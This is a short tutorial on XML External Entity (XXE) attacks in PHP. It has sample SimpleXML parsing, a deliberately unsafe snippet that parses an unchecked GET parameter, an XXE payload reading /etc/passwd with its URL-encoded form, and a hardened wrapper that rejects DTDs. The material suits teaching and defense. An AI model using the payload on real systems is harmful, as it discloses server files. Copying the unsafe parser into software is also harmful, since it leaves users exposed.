XML External Entities (XXE)
Understanding the XML Parser
Assign XML data to a variable
<?php
// Well-formed sample document held in a PHP string
$myXMLData =
"<?xml version='1.0' encoding='UTF-8'?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>";
Parsing XML
// simplexml_load_string() returns a SimpleXMLElement, or false on failure
$xml = simplexml_load_string($myXMLData) or die("Error: Cannot create object");
print_r($xml);
?>
Result
SimpleXMLElement Object ( [to] => Tove [from] => Jani [heading] => Reminder [body] => Don't forget me this weekend! )
Parsing XML from User Input
<?php
// The raw GET parameter is handed straight to the parser: untrusted XML, no checks
$xml = simplexml_load_string($_GET['xml']);
Print the XML element as a string
print_r((string)$xml);
?>
Parameter Manipulation from URL
?xml=<test>xml data</test>
Result
xml data
XXE Payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><test>&xxe;</test>
URL-encoded value for the GET parameter
%3C%3Fxml+version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A%3C%21ELEMENT+foo+ANY+%3E%0D%0A%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22+%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2Ftest%3E
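A hardened counterpart to the user-input parser shown above, added here as an example and not code from the original page: it refuses any DTD before parsing, never sets LIBXML_NOENT (the flag that makes simplexml substitute external entities), blocks network access with LIBXML_NONET, and logs parser errors instead of dying. The function name parseUntrustedXml and the two constructed inputs are assumptions.

```php
<?php
// Added example: safe wrapper around simplexml_load_string() for untrusted input.
// Assumed helper name; the inputs at the bottom are constructed for demonstration.

function parseUntrustedXml(string $input): ?SimpleXMLElement
{
    // Ordinary data exchange needs no DTD; a DOCTYPE or ENTITY declaration is
    // exactly what an XXE payload requires, so reject it before parsing.
    if (stripos($input, '<!DOCTYPE') !== false || stripos($input, '<!ENTITY') !== false) {
        error_log('Rejected XML input containing a DTD or entity declaration');
        return null;
    }

    // On PHP < 8.0 the external entity loader can also be switched off globally
    // (the function is deprecated from 8.0, where loading is off by default).
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    // Collect libxml errors instead of emitting warnings or calling die().
    $previous = libxml_use_internal_errors(true);

    // LIBXML_NONET forbids network fetches; LIBXML_NOENT is deliberately absent,
    // so even a declared entity would never be expanded.
    $xml = simplexml_load_string($input, 'SimpleXMLElement', LIBXML_NONET);

    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($xml === false) {
        foreach ($errors as $e) {
            error_log('XML parse error: ' . trim($e->message));
        }
        return null;
    }
    return $xml;
}

// Constructed inputs: the benign request from the page and the XXE payload.
$benign  = '<test>xml data</test>';
$hostile = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>';

echo 'benign:  ', parseUntrustedXml($benign)  !== null ? "accepted\n" : "rejected\n";
echo 'hostile: ', parseUntrustedXml($hostile) !== null ? "accepted\n" : "rejected\n";
```

The DOCTYPE check is the decisive control: whether the payload on this page actually discloses a file depends on the parser being told to substitute entities, so the wrapper removes that possibility regardless of the libxml version in use.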